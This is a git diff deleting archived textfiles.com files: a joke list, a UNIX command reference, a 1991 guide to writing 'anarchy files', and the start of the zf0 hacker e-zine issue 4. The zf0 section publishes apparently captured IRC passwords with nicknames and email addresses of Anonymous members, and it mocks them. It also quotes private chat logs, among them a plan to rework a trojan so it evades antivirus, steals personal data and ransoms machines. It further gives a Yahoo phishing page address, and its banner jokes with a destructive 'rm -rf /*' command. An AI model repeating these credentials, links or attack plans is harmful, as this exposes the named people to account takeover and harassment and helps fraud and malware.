-33. Your main goal in life is to become the president of Bulemia.
-34. Nearly everything you say involves the word, "P-toing!"
-35. You argue with yourself about which is better, to be eaten by a koala
- or to be loved by an infectious disease.
-36. You like to sit in cornfields for prolonged periods of time, and
- pretend that you're a stalk.
-37. You think that exploding wouldn't be so bad, once you got used to it.
-38. You try to make a list of the Warning Signs of Insanity. (cough)
-39. People offer you help, but you unfortunately interpret this as a
- violation of your rights as a boysenberry.
-40. You like reading lists like this. :) (The Paul Richter
- Special Edition Appendix)
-41. You sit in your room for hours on end listening to Peter, Paul & Mary
- and playing solitaire on your computer.
-42. You experience periods of time when your mouth can do nothing but sing
- "Mama's little baby loves short'nin', short'nin...."
-43. You begin to start almost every conversation with the introduction to
- _The A-Team_ theme song.
-44. You spend three hours sitting on the floor cutting and pasting a
- project for your COLLEGE English course, and you get
- really frustrated because you can't recall
- all the kindergarten-period skills that it requires.
-45. You check your e-mail about six times a day, only to find that nobody
- cares enough to send anything to you.
-46. You believe that Quayle would actually win the 1996
- presidentialelection.
-47. You read Anne Sexton's poetry for twelve out of any sixteen-hour
- period.
-48. You read Sylvia Plath to cheer yourself up, and when that doesn't work
- you pop _The Wall_ into the stereo...
-49. You think Popeye's anchor tattoo would look even better on YOUR
- forearm.
-50. You use Speed Stick Clear Ocean Surf Deodorant for the scent.
-51. You start appending a list like this, and you find yourself just going
- on and on and on and on...
-52. You start to repeat yourself.
-53. You start to repeat yourself.
-54. You start really stretching for bad jokes and cheap laughs.
-55. You recognize that you are doing so.
-56. You blatantly announce it.
-57. You keep looking in the Rap section at Tower Records trying to find
- that new M.C. Escher album.
-58. Your greatest accomplishment to date in your college career is your
- new-found ability to blow smoke rings.
-59. You resort to mass e-mailings as your sole means of unabashedly begging
- for attention.
diff --git a/.md/thoughts/txt/textfiles.com/unix_bible.txt b/.md/thoughts/txt/textfiles.com/unix_bible.txt deleted file mode 100644 index 722122e..0000000 --- a/.md/thoughts/txt/textfiles.com/unix_bible.txt +++ /dev/null @@ -1,449 +0,0 @@ - UNIX
- ~~~~
-
- Command Description
- ~~~~~~~ ~~~~~~~~~~~
-
- awk Search for a pattern within a file. Includes
- a built-in programming language.
-
- bdiff Compares two large files.
-
- bfs Scans a large file.
-
- cal Displays a calendar.
-
- cat Concatenates and prints files.
-
- cc C compiler.
-
- cd Change directory.
-
- chgrp Changes a file's group ownership.
-
- chmod Changes a file's access permissions.
-
- chown Changes the individual ownership of a file.
-
- cmp Compares two files; diplays the location (line
- and byte) of the 1st difference between these.
-
- comm Compares two files so as to determine which
- lines are common to both.
-
- cp Copies a file to another location.
-
- cu Calls another UNIX system.
-
- date Returns the date and time.
-
- df Displays free space in the file system.
-
- diff Displays the differences between two files
- or directories.
-
- diff3 Displays the differences between three files
- or directories.
-
- du Reports on file system usage.
-
- echo Displays its argument.
-
- ed Text editor.
-
- ex Text editor.
-
- expr Evaluates its argument which is generally
- a mathematical formula.
-
- f77 FORTRAN compiler.
-
- find Locates the files w/ specified characteristics.
-
- format Initializes a floppy disk.
-
- grep Searches for a pattern within a file. (see awk)
-
- help Salvation.
-
- kill Ends a process.
-
- ln Used to link files.
-
- lpr Copies the file to the line printer.
-
- ls Displays info. about one or more files.
-
- mail Used to receive or deliver e-mail.
-
- mkdir Creates a new directory.
-
- more Displays a long file so that the user
- can scroll through it.
-
- mv Used to move or rename files.
-
- nroff Used to format text.
-
- ps Display a process's status.
-
- pwd Display the name of the working directory.
-
- rm Removes one or more files.
-
- rmdir Deletes one or more directories.
-
- sleep Causes a process to become inactive for a
- specified length of time.
-
- sort Sort and merge one or more files.
-
- spell Finds spelling errors in a file.
-
- split Divides a file.
-
- stty Display or set terminal parameters.
-
- tail Displays the end of a file.
-
- troff Outputs formatted output to a typesetter.
-
- tset Sets the terminal type.
-
- umask Allows the user to specify a new creation
- mask.
-
- uniq Compares 2 files. Finds and displays lines
- in one file that are unique.
-
- uucp UNIX-to-UNIX execute.
-
- vi Full screen editor.
-
- wc Displays details in the file size.
-
- who Info. on who else be online.
-
- write Used to send a message to another user.
-_______________________________________________________________________________
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- awk program filenames
- awk -f programfilenames filenames
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [awk] utility can be used to find any lines in a file which
- match a certain pattern; once found, these lines can be processed.
- In the first configuration, the program that [awk] is to
- execute is specified in the command line. In the second,
- the program is stored as the file given in programfilename.
- The -f option instructs [awk] to read this file.
-
-
- [bdiff] is used to compare files too large for [diff]. See
- [diff] for the format.
-
-
- bfs filename
- ~~~~~~~~~~~~
- [bfs] is used to scan a large file to determine where to split
- it into smaller files.
-
-
- cal 01-12 (month) 0-9999 (year)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [cal] utility can be used to display a calendar of any year
- from 0 to 9999 AD, and any or all of the twelve months.
-
-
- cat filename
- ~~~~~~~~~~~~
- [cat] can be used to examine a short file. See [more] for
- lengthier files.
-
-
- number[cc]
- ~~~~~~~~~~
- The [cc] command changes the entire current line, or a group
- of lines starting with the current line. [number] represents
- the number of old lines to be deleted.
-
-
- cd directory name
- ~~~~~~~~~~~~~~~~~
- The [cd] command causes the current working directory to be
- changed. The [directory name] can be either a full or partial
- path name.
-
-
- chgrp groupname filename
- ~~~~~~~~~~~~~~~~~~~~~~~~
- This command changes the group ownership of a file.
-
-
- chmod {ugoa} {+-} {rwx}
- ~~~~~~~~~~~~~~~~~~~~~~~
- The [chmod] utility changes a file's access permissions. [u]
- specifies the user or owner's login name, [g] specifies a group
- and [o] indicates all others. [a] indicates the user, group,
- and all others; c'est the default. [+] adds permission; [-]
- deletes it. [r] indicates read, [w] write, and [x] execute.
-
-
- chown individualname filename
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [chown] changes the individual ownership of a file (see chgrp).
-
-
- cmp filename1 filename2
- ~~~~~~~~~~~~~~~~~~~~~~~
- [cmp] is one of the four principle UNIX file comparison utilities.
- It compares 2 files, and returns the positions where they differ.
-
-
- comm -options filename1 filename2
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [comm] utility, in comparing two files, produces three
- columns of output. The first contains lines unique to the
- first file, the second, lines unique to the second, and the
- third column, lines common to both files. By placing the
- numbers [1], [2], and/or [3] in the [options] position, any
- one (or more) of these columns can be suppressed.
-
-
- cp sendingfile receivingfile
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [cp] command copies a file. [sendingfile] is the file to be
- copied, [receivingfile] is the file to which it is copied.
-
-
- diff [options] filename1 filename2
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Again, a file comparison utility. However, with [diff], the
- differences are displayed as instructions that can be used
- to edit the files so that they are identical.
-
-
- diff3 filename1 filename2 filename3
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Similar to [diff], [diff3] is unique in that it can compare
- three files. Gee.
-
-
- ed filename
- ~~~~~~~~~~~
- One of the UNIX's three editing utilities, [ed] is a basic line
- editor. I'm sure there are other files that will explain how
- to use [ed]. Thus, I'll confine myself to a rough outline:
- e filename ........... edit a different file
- f filename ........... changes the currently specified file.
- h .................... provides explanation of errors.
- I
- text ................. inserts text before the current line.
- line,linel ........... lists the specified lines.
- line,linen ........... displays specified lines, preceded by
- their line numbers.
- q .................... exit from [ed]
- w .................... writes buffer to current filename.
- + or - ............... +number of lines closer to end
- -number of lines closer to beginning.
-
-
- expr formula
- ~~~~~~~~~~~~
- Utility which evaluates an expression.
-
-
- find directory searchcriteria parameter actioncriteria parameter
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [find] utility can be very useful indeed, especially when
- confronted by a UNIX with countless files. Basically, this
- command finds files which meet certain criteria, and then
- performs an operation (such as printing the files). Search
- criteria consists of the following:
-
-
- Criteria Parameter Description
- ~~~~~~~~ ~~~~~~~~~ ~~~~~~~~~~~
- -name filename Files whose names match [filename]
- will meet this criteria.
- -type filetype Files whose type matches that specified
- [b] block special will meet criteria.
- [c] character spec. file
- [d] directory file
- [f] plain file
- -links +/- x Files with # of links indicated by
- + or - x meet this criteria.
- -user login name Files belonging to user with given
- or user ID # login name or ID # meet criteria.
- -group group name Files belonging to group with given
- or group ID # group name or ID # meet this criteria.
- -size + or - x Files greater than +x bytes or less
- than -x bytes meet this criteria.
- -atime + or - x Files not accessed within +x days,
- accessed within -x days, or acc-
- essed x days ago meet criteria.
- -mtime + or - x Files NOT modified within +x days,
- modified within -x days, or modified
- x days ago will meet this criteria.
- -newer filename Files modified more recently than
- [filename] meet this criteria.
- Action Criteria " "
- ~~~~~~~~~~~~~~~ ~ ~
- -print - When search criteria are met, path
- name of the file is displayed.
- -exec command{ }\; Executes given command when search
- criteria are met. { } indicates file-
- name, [\;] ends the command.
- -ok command{ }\; Exactly like -exec, except user is
- prompted [y] or [n] before command.
-
-
- grep -options searchstring filenames
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Another search command, this for a particular string of chars.
-
-
- ln original new
- ~~~~~~~~~~~~~~~
- [ln] establishes a file link. For this utility, [original] repre-
- sents the filename to be linked, [new] the filename of the new
- link to the original.
-
-
- [ls] provides directory information. [ls -l/] displays a more
- complete version of the info. list.
-
-
- mail username username
- ~~~~~~~~~~~~~~~~~~~~~~
- This utility allows e-mail to be sent to other system users.
-
- mail
- ~~~~
- Simply typing [mail] checks the user's own mailbox.
- When sending mail, several items must be set:
- ~s text ............ sets the subject field
- ~c user names ...... sends other users carbon copies of mail
- m user names ....... activates the compose mode, with the
- specified users as the message's recipients.
- ~h ................. displays and allows editing of all headers.
- ^D ................. ends message editing; sends mail.
- ~r filename ........ places file in body of message (keen command)
-
- Reading One's Own Mail:
- h number or range ....... causes specified headers to be displayed
- p message # ............. displays entire message
- d number or range ....... deletes specified messages
- u number or range ....... undelete specified mail during SAME
- mail session (messages removed after q)
- q ....................... leave the post office
-
-
- mkdir directoryname
- ~~~~~~~~~~~~~~~~~~~
- [mkdir] allows creation of a subdirectory, for your dining
- enjoyment.
-
-
- more filename
- ~~~~~~~~~~~~~
- For longer files, [more] is a convenient utility. It will display
- the first screen of file data and then stop, allowing the user
- to control scrolling henceforth.
-
-
- mv oldfilename newfilename
- ~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [mv] utility can be used simply to rename a file, or...
-
-
- mv filea fileb... directory
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [mv] can also be used to move files to a new directory, provided
- the directory exists, and you have write access to it.
-
-
- ps -options
- ~~~~~~~~~~~
- The [ps] command, by itself, displays the status of each active
- process controlled by your terminal. This status report includes
- the Process Identification Number (PID), the terminal (TTY), the
- time the process has been executing (TIME), and the command line
- used to execute the process (CMD).
- [ps]'s three options include -a (displays info. on active processes
- controlled by any terminal), -x (info. on ALL active processes), and
- -l (an extensive status report on all active processes).
-
-
- pwd
- ~~~
- [pwd] command displays the present working directory.
-
-
- rm filename
- ~~~~~~~~~~~
- [rm] removes a file. More than one file can be specified.
-
-
- rmdir directoryname
- ~~~~~~~~~~~~~~~~~~~
- This utility removes a directory, an EMPTY directory (save the
- hidden files).
-
-
- sleep seconds
- ~~~~~~~~~~~~~
- The [sleep] utility causes a process to become inactive for a
- certain period of time. Max. seconds is 65,536 (about 18 hrs).
-
-
- sort -options filenames
- ~~~~~~~~~~~~~~~~~~~~~~~
- [sort] merges and sorts files. Without options, [sort] orders
- files by the ASCII codes of the characters at the beginning
- of each line. Options include -b (leading blanks ignored), -d
- (only letters, digs, and blanks considered; "dictionary sort"),
- -f (case ignored), -n (numerical sort [for numerical data]), and
- -r (a reverse sort).
-
-
- split -size original resulting
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [split] divides a large file into smaller ones. [size] refers to
- the number of lines the resulting files contain, [original] is
- the name of the orig. file, and [resulting] represents the
- prefix name assigned to the newly created files.
-
-
- umask ugo
- ~~~~~~~~~
- [umask] changes the file CREATION mask (see [chmod] for already
- existing files). Here, [u] represents the owner's access
- permission, [g] the group's a.p., and [o] the a.p. for all others.
-
-
- [uucp] (UNIX to UNIX copy) can be used to send files to a
- remote UNIX, or retrieve files from the remote system.
- Other UNIX comm commands include [cu] (which establishes contact
- with another system), and [uux] (UNIX to UNIX execute; allows
- commands to be executed on a remote system).
-
-
- wc -options filenames
- ~~~~~~~~~~~~~~~~~~~~~
- The [wc] utility displays file-size information. This includes
- the number of lines, words, and characters. By chosing the
- -l, -w, or -c options, the information can be limited to only
- line, word, or character number.
-
-
- who
- ~~~
- A very useful command (which some systems respond to even before
- a user is actually logged on), [who] displays a list of users
- currently online. This list includes the user's name, terminal
- device # (tty), and the log-in time. [who am i] displays info.
- only on the user who executed the command.
-
-
-
\ No newline at end of file diff --git a/.md/thoughts/txt/textfiles.com/writers.txt b/.md/thoughts/txt/textfiles.com/writers.txt deleted file mode 100644 index aa1df67..0000000 --- a/.md/thoughts/txt/textfiles.com/writers.txt +++ /dev/null @@ -1,122 +0,0 @@ -12/02/91 03:54am
-
-HOW TO PROPERLY WRITE AN ANARCHY FILE
--------------------------------------
-Written By The Freddy
-In Association With The National Network of Anarchists and Nihilists (NNAN)
-
-Introduction
-------------
- Have you seen the number of shitty anarchy files out there? It's
-pathetic the way some idiots try to write files. I wrote this to give
-those people and first time writers pointers on how to correctly write a
-file.
-
-Disclaimer
-----------
-This document was intended for informational purposes ONLY, the author and
-the National Network of Anarchists and Nihilists do not endorse or support
-any illegal action presented here or in any other documents which we
-release. The only motivation for the writing of this document is purely
-for educating the general public. The author and the National Network of
-Anarchists and Nihilists will not be held responsible for any actions by
-the reader of this document.
-
-Construction of a Good Anarchy File
------------------------------------
- There are many things to remember when writing a file. Here are
-some pointers:
-
- 1) Always have the date and time at the beginning of the file like
- I have done. This is the most important part of any anarchy
- file because some material is time-sensitive and it is also nice
- to know how out-dated a file is. A good example of this is the
- Jolly Roger Cookbook. A very nicely written piece, however
- there was no indication of when it was written. Most of the
- sources to obtain slim jims, lock picks, etc. were out of
- business by the time I first got hold of it.
- 2) Always use ASCII. Not ANSI but ASCII. This is for several
- reasons. One is that some viewers, word processors, etc. do not
- or cannot support the extended characters. The same holds true
- for several types of printers. Second, I have what seems like
- millions of files that were written on Word Perfect, Word Star,
- Multimate, MS Word, etc. Most people don't have these editors
- or viewers. I remember it took me two weeks to convert the
- Terrorist's Cookbook to ASCII from the WP format so I could
- print it. And finally, ASCII files are smaller and there are
- several ASCII only editors that have all the same functions of
- expensive word processors. I personally use MULTI-EDIT V3.00b.
- Call your local 10 gig public domain board and you will find it
- or some other qualified ASCII text editor.
- 3) As a rule of thumb, set margins for 75 characters and never go
- beyond that. As mentioned before, a good ASCII editor will let
- you set up margins. This is mainly for printers. You may or
- may not believe it, but 90% of all anarchists print up files for
- easy reference. And some files have really strange margins. I
- once found a file with the right margin at column 100.
- 4) It is perfectly all right to FUCKIN' cuss in a file. It is also
- semi-acceptable(but lame) to say PHUCK, FONE, etc.; but never
- ever write like this:
- "so you want to be an anarchist? all ya gotta do is learn how to
- rebel and denounce all government laterz"
- Slang is okay, but learn to spell and for God's sake use proper
- punctuation and capitalization.
- 5) If you are going to include a diagram, schematic, or whatever,
- try not to do it yourself with ASCII characters if at all
- possible, unless you are good at it. Get someone else to do
- it for you. Very few people can draw a good ASCII schematic.
- If possible include two of each diagram or schematic. One in
- the text and one in ANSI format or .gif format. There are many
- draw programs out there. Also it's nice to find a self-loader
- for your .gif's. Keep the ASCII diagrams, as they will do in a
- pinch and not everyone can printout .gif files. ANSI is nice
- and all, but, generally, it should be avoided.
- 6) Do or have done what you are writing about. I once saw a file
- that scared me a bit. Here is part of it:
- "now that theoretically should be the right ratio. I dunno. Tell
- me if this works."
- Now if you don't know what the fuck you're writing about, then
- don't write about it. That simple. Also don't alter files. I
- once found a file where someone altered the ratios for nitro.
- Not to nice. If you've done it before, please don't. We don't
- need assholes like you.
- 7) You should have a good equipment, chemical, parts, or whatever
- list. It should also be complete. Like for instance a file
- construction of a olive box should tell you that:
- "Quantity Item Source
- -------- ---- ------
- 1 Small plastic box Radio Shack (R.S.270-224)
- 1 1" x 2" perboard Radio Shack (R.S.276-1395)"
- I don't know how many times I've seen files which tell you what
- to get but not specifically. Like:
- "get some resistors and 2 capacitors"
- Now if this author knew anything about electronics, he would
- have known that you need the specific voltages or whatever. Be
- specific.
- 8) Also remember, don't use tabs. People have tabs set up for
- different spaces. You get some pretty strange stuff sometimes.
- For instance someone might have tab set at 9 characters and you
- have it a 8 characters. There are also many printers that use
- funny tab spacings. When you try to view or print these files,
- you get stuff like:
- "**************************************************************
- * How to Make Your Very Own Home-Made Tennis Ball Launcher *
- * by *
- * The Stupid Anarchist *
- * *
- **************************************************************"
- Always use the space bar to indent.
- 9) A disclamer is also important. Even though you don't think so,
- your handle doesn't conceal your identity. The police, FBI,
- sectret service, or any other government agency(not to mention
- Ma Bell) has both the time and the resources to get you nailed
- if they feel like. Don't laugh at this point. It could save
- your life. Or maybe 20 years of it.
-
-Conclusion
-----------
- Well, I hope this file will better the quality of the files out
-there. I can be reached at The DeaTh BoX BBS--(714)970-6710--which is the
-home of NNAN. Well, it's getting late so until next time, adieu.
-
-12/02/91 04:43am
diff --git a/.md/thoughts/txt/textfiles.com/zf04.txt b/.md/thoughts/txt/textfiles.com/zf04.txt deleted file mode 100644 index 0274f3b..0000000 --- a/.md/thoughts/txt/textfiles.com/zf04.txt +++ /dev/null @@ -1,16853 +0,0 @@ - - _/_/_/_/_/ 444444444 ~~~~~~ - _/ _/_/ _/ _/_/ _/_/ 4;;;;;;;;4 Internet Superheroes ~ - _/ _/_/_/_/ _/_/ _/ _/ 4;;;;;;;;;4 - _/ _/ _/ _/ _/ 4;;;;44;;;;4 With great power -_/_/_/_/_/ _/_/_/ _/ _/_/ 4;;;;4 4;;;;4 comes great responsibility. - 4;;;;4 4;;;;4 - .` .` .`.` 4;;;;4 4;;;;4 And great babes. - -+;//. `;/;/- 4;;;;444444;;;;444 - -++%+. `/+/+-` 4;;;;;;;;;;;;;;;;4 - -o%/o; -++/+;` 4444444444;;;;;444 ______ __ - .+0%+o- `/+;/+- 4;;;;4 | |.--.--.--.-----.-----.--| | - /0%-oo;`` `+o;;o/` 4;;;;4 | -- || | | | | -__| _ | - `+0/.+ossoo+/.`` ` `;//+++oo-.++- 444444 |______||________|__|__|_____|_____| - -0%;`-/++ooooo+o/++oossso++/`.oo; - -0%oossssssssssssssssyssssso+oss/ -- Table of 0wned -- - -/0o/-/syyyyyyyyyyyyyyyo;;/oso/` - ``;yhyyhhhydddddyyhhyhy/` ` 1. Anonymous - -ohhs//dmy/ymmmmmy;omdo+yho-` 2. g00ns --symmho;` /Nm+.sNNNNmo.;mm+``;sddo//` 3. illmob -oNNdo-` +Nd; ;NNNNh; .dNo` `-odNd; 4. Safety on the Internet -oMm+` oNy- `sNNmo` `hNs. /mm/` 5. Robert Lemos -/Nd; +Ns. -hds. `sNs. .dm/` 6. The Fed Jingle -.md; +No` ..` `sNs. `dd/ 7. Comodo -`om; ;ms. `yNo` .mh- 8. CF0 - .do` .dy- `hd/ ;mo` 9. Blackcode - ;y- `+m; .ms. `yy; 10. Trivia Security - `/+` .ho` +h/ ;y/` 11. Pwnie Awards - `-. ;d; .h+` ;;` 12. The Cult of the Dead Cow - ` `;/` `oo. `` 13. Pwnee Awards - - - - - S y m a n t i c - T h r e a t C o n - --------------------------------------------- - | Level 6: # rm -rf /* | - | (//////////////////////////////////////6) | - ---t h i s o n e g o e s u p t o s i x---^--- - - -At last the 2008 show! The torch-song no-one ever sings! The curfew chorus line! -The comedy divine! The bulging eyes of puppets, strangled by their strings. -There's thrills and chills and girls galore, there's sing-songs and surprises! -There's something here for everyone, reserve your seat today! - -We're happy to be have you back. Do we ever have some treats! We have some sweet -articles. We rm'ed g00ns, we took a successful forray into Anonymous' world, we -conquered and destroyed Blackcode, and, of course, we have the Cult of the Dead Cow -owned and exposed. We top those off with lots of fun little owns and articles. Kick -up your feet and settle in, this is going to take all night. - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Anonymous zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -/*********************************** -* -* We owned Anonymous. Although they sell you the idea that they cannot be owned -* because they lack any structure, we owned anybody and anything involved that we -* wanted to. They had a quote about being unable to kill a dragon with no head. We -* just watch the dragon stumble around drunkenly and then we stab all its toes. -* -* We owned inky_'s main server, we owned partyvan.info, we owned a lot of people -* and sites that were not worth including in this article. The anon scene is massive -* and we owned whatever we wanted, and brought owns and lulz here for you. They get -* a lot of press and talk a lot of shit (fucking annoying ED pages too), but all -* they really are is the *chan community rebranded (currently) around the idea of -* destroying the CoS. ^ban^ basically says that if you are a channer, you're anon, -* and if you aren't, you aren't. -* -* A lot of the top guys have no respect for the morons dedicated to their cause, -* and don't mind abusing or misleading them (to which they so easily follow). They -* don't mind money either, as we will demonstrate. Something stinks about this, it -* reminds me of *something*, if only I could remember what... -* -* The most talented people in Anonymous hack Scientology people. Think about that. -* In the hacking world, that places them below the people who hacked -* ethelsflowershop.com and above the people who DoS specialneeds.com. -* -* We could be dropping your names, addresses, and email addresses, but you're kids, -* we do have some mercy. -* -* On with the show! -* -***********************************/ - -// Hey it's that guy who tried to take over 4chan. Check out his IRC problems! -Xyrix -> nickserv@anonymous.services: REGISTER 01110 x.yr.ix@hotmail.com -Xyrix -> nickserv@anonymous.services: REGISTER Xyrix A1B2C x.yr.ix@hotmail.com -Xyrix -> nickserv@anonymous.services: REGISTER Xyrix A1B2C3 x.yr.ix@hotmail.com -Xyrix -> nickserv@anonymous.services: REGISTER Xyrix c0ncr3t3456 x.yr.ix@hotmail.com -Xyrix -> nickserv@anonymous.services: REGISTER Xyrix lolol x.yr.ix@hotmail.com -Xyrix -> nickserv@anonymous.services: REGISTER Xyrix maniclol x.yr.ix@hotmail.com -Xyrix -> nickserv@anonymous.services: REGISTER help - -Speaking of which, it looks like we got a fan after rming g00ns: - -From: X Y <xyrix@live.com> -To: superheroes@hushmail.com -Date: Thu, 08 May 2008 19:03:20 +0100 -This message is not encrypted, and is not digitally signed by . -Hey, I was just wondering where you guys hung out normally. Irc or on silc? - -// Some select passes, starting with the [nig] bitches -[nig]A_Non_E_Moose_ -> nickserv@anonymous.services: IDENTIFY qrrbrbirlbel -[nig]Azure -> nickserv@anonymous.services: identify niceguyjin -[nig]Azure -> nickserv@anonymous.services: identify nigguyjin -[nig]Banhammer -> nickserv@anonymous.services: identify letmein -[nig]CircleK -> nickserv: register bullpass1 -[nig]Dart27 -> nickserv@anonymous.services: register midnight3 insurgentdart27@gmail.com -[nig]Dravas -> nickserv: identify x8i9j9w -[nig]Kazimir -> nickserv: identify wood.lake -[nig]Moose -> nickserv@anonymous.services: identify qrrbrbirlbel -[nig]Picatta -> NickServ: IDENTIFY lolcats8295 -[nig]Skorski -> nickserv: identify internethate -[nig]Spaise -> nickserv: identify 198956spaise -[nig]Tycho -> NickServ: IDENTIFY auli711 -[nig]banhammer -> nickserv@anonymous.services: identify letmein -[nig]brambi -> NickServ: IDENTIFY exodus -[nig]codenaur -> nickserv: REGISTER bobbin codenaur@omfgawd.org -[nig]kando -> nickserv: identify qwerty -[nig]kando -> nickserv: identify qwertyui -[nig]msgmcmuffin -> nickserv: identify haX0rm3plz -[nig]neG -> nickserv: identify fucktits -[nig]shamrock -> nickserv@anonymous.services: identify jimmy123 -[nig]spic -> nickserv: identify alphabette -[nig]squid -> nickserv: identify w00tah - -// Some other passes of (mostly) relevant people in the anon scene -inky_ -> nickserv: identify jblink -Alyosha -> nickserv: identify CLEVERPASSWD1111 -RickRollington -> nickserv: identify muddymuddykipz -Rorschach -> nickserv@anonymous.services: IDENTIFY saltywalrus -Tycho -> NickServ: IDENTIFY auli711 -negroe -> nickserv: ghost TheShining jewslol -negroe -> nickserv: identify aspadmd1 -Kerx -> NickServ: identify hit13r -Freeze` -> nickserv@anonymous.services: identify wtfuxsucks -SpunkWang -> NickServ: IDENTIFY SpunkWang! -trypta -> nickserv: identify moveon -Nihilanth -> nickserv: identify bper231a -Skorski -> nickserv@anonymous.services: ghost Deltantor slowpoke -Muhu -> nickserv@anonymous.services: IDENTIFY niggershit7 -Fail-chan -> nickserv@anonymous.services: identify cocks123 -Delacroix -> nickserv: id lulzy1 -f0rked -> nickserv@anonymous.services: id holyshit -_meh_ -> NICKSERV: IDENTIFY iamroot -innocuous -> nickserv: identify thepassword. -innocuous -> nickserv: identify thenickpassword. -innocuous -> nickserv: identify thenickpass. -Ms_Mister -> nickserv@anonymous.services: identify farkman -trapnest -> nickserv: identify aichii32 -DrMengele -> NickServ: identify mofo47 -bittwist -> nickserv@anonymous.services: identify sun42 -Spaise -> nickserv: identify 1898956spaise -nfinity0 -> NickServ: identify bluemonkey66 -infinity0 -> NickServ: register Ivy saturation6666 infinity0x@gmail.com -Cobrian -> Nickserv: identify Amiga32 -cheezmasta_ -> nickserv@anonymous.services: IDENTIFY iamthecheese101 -denvetta -> NickServ: IDENTIFY madman01 - -codenaur -> nickserv: IDENTIFY thaergaerg -codenaur -> nickserv: identify bobbin -codenaur -> nickserv: identify ilovecock // We can't make this shit up - -RickRollington -> chanserv: identify #insurgency h875n8w45h89 - -/* -* -* Let's start it off with #el/i/tes -* -*/ - -^ban^ -> #el/i/tes: We are True Anonymous. -// And we are watching. - -// ^ban^ is one of the big names in anonymous.. "old anon".. check out his -brilliant ideas! -^ban^ -> #el/i/tes: well, a suggestion for a board name -^ban^ -> #el/i/tes: I don't suggest we model after said board though -^ban^ -> #el/i/tes: http://4-ch.net/dqn/ -^ban^ -> #el/i/tes: The Elitist Superstructure of DQN -^ban^ -> #el/i/tes: (The Elitist Superstructure of TPN you might recognize, -Nihilanth) - -// ^ban^ had his docs dropped already, big drama - -// And we finally know what old anon care about - money -Kerx -> #el/i/tes: So we're not gonna sit on asses and have yet another person -run our wiki and have him profit of us -Kerx -> #el/i/tes: time once and for all to buy own server and do our shit on -it and rent out space to make teh money -Freeze` -> #el/i/tes: and how would that work -Freeze` -> #el/i/tes: I'm all eyes here -Kerx -> #el/i/tes: just how the guy running anonhost is doing his -Kerx -> #el/i/tes: and we've got an easy way to secure money with the xenu -raids -Kerx -> #el/i/tes: make sure we have some true reps for the wiki go out and -collect in person also on next raid - -// More money -Kerx -> #el/i/tes: ^ban^ we already has a way to get a ton of dough - -// More money -Picatta -> #el/i/tes: and we're putting a couple ads on it - -// More money -Picatta -> #el/i/tes: We could do a proxy list and put ads on it - -// They are masters of technology and contemporary security issues -TheShining -> #el/i/tes: but we can't tell anyone -TheShining -> #el/i/tes: outside of this room -TheShining -> #el/i/tes: i was thinking about us getting a trojan -TheShining -> #el/i/tes: but modifying it -TheShining -> #el/i/tes: completely -TheShining -> #el/i/tes: until everything is changed to that virus scanners -wont pick it up -TheShining -> #el/i/tes: and distribute it to as many computers as possible -TheShining -> #el/i/tes: and take as much personal information as possible -TheShining -> #el/i/tes: and or hold the computers for ransom -Freeze` -> #el/i/tes: hmm -Freeze` -> #el/i/tes: if you could really do that -Freeze` -> #el/i/tes: I'd help out -TheShining -> #el/i/tes: the hardest part is to re-do the code on the trojan -TheShining -> #el/i/tes: and we'd also have to keep this secret until we had at -least 10,000 zombies - -// omg anonymous revealed -031811:fuckingfruit -> #el/i/tes: he's waiting for kakama (the leader of -anonymous) to decide if to delete a wiki page or not - -// Kakama's site and yahoo phish page: http://login.yahoo.890m.com/yahoo.html - -// The illustrious ^ban^ explains that anon aren't hackers, they're channers, -and if you're not a channer, you're not anon -clorox -> ^ban^: you have alot of enemies...i am one of them -clorox -> ^ban^: you were a faggot when we first came here to me -^ban^ -> clorox: there's a pretty simple explanation for that, you know -^ban^ -> clorox: I was here when partyvan was founded, and didn't like the idea -of it abandoning the entire idea for it's founding :| -^ban^ -> clorox: The original idea was to have a network for anon, by anon, and -only anon -clorox -> ^ban^: what makes you anon -^ban^ -> clorox: but things didn't happen that way -^ban^ -> clorox: by anon I mean anyone from the *chan culture -// IF YOU WANT TO BE ANON CLOROX YOU HAVE TO BE MORE CHAN - - -/* -* -* Who wants to read the private chats of 711staff? -* -*/ - -// I beg to differ -jewlion -> #711staff: this is your only warning -jewlion -> #711staff: what happens in here -jewlion -> #711staff: stays in here - -// Ego -lolihaetfire -> #711staff: Actually, christ, who are our other admins? -inky_ -> #711staff: ^Bi am the other admin -lolihaetfire -> #711staff: danke -inky_ -> #711staff: why the hell does nobody acknowledge me -inky_ -> #711staff: they're always like 'jewlion this' 'jewlion that' -inky_ -> #711staff: if it wasn't for me this site wouldn't even exist - -// And rank -syense -> #711staff: we sure will miss jewlion though. -Kakama -> #711staff: WHAT -Kakama -> #711staff: HUH? -Kakama -> #711staff: JEWLION GO WHERE? -syense -> #711staff: he has stepped down. -syense -> #711staff: hes getting marrieda -DaftWally -> #711staff: I assumed inky_ would take over -syense -> 